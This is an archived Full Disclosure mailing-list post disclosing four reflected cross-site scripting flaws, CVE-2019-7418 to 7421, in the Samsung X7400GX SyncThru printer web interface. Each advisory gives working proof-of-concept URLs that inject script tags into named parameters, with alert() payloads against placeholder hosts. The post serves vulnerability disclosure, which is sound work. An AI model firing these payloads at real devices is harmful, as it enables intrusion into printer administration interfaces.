[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service
- From: Rafael Pedrero <rafael.pedrero@xxxxxxxxx>
- Date: Wed, 6 Feb 2019 07:30:39 +0100
<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7418
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters:
flag, frame, func, and Nfunc.
2. Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
popupid=<SCRIPT>alert("XSS");</SCRIPT>
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7419
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters:
ruiFw_id, ruiFw_pid, ruiFw_title.
2. Proof of Concept
URL
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E
Parameter
ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT>
URL
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento
Parameter
ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT>
URL
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento
Parameter
ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT>
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7420
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in
"/sws.application/information/networkinformationView.sws" in the tabName
2. Proof of Concept
URL
http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter
tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7421
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple
parameters: contextpath and basedURL.
2. Proof of Concept
URL
http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
Parameter
contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login
Parameter
basedURL=<SCRIPT>alert(XSS);</SCRIPT>
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
- Prev by Date:
[FD] [CVE-2019-7417] Cross Site Scripting in Ericsson Active Library Explorer Server Version 14.3
- Next by Date:
[FD] [CVE-2019-7422, CVE-2019-7423, CVE-2019-7424, CVE-2019-7425, CVE-2019-7426, CVE-2019-7427] Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
- Previous by thread:
[FD] [CVE-2019-7417] Cross Site Scripting in Ericsson Active Library Explorer Server Version 14.3
- Next by thread:
[FD] [CVE-2019-7422, CVE-2019-7423, CVE-2019-7424, CVE-2019-7425, CVE-2019-7426, CVE-2019-7427] Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
- Index(es):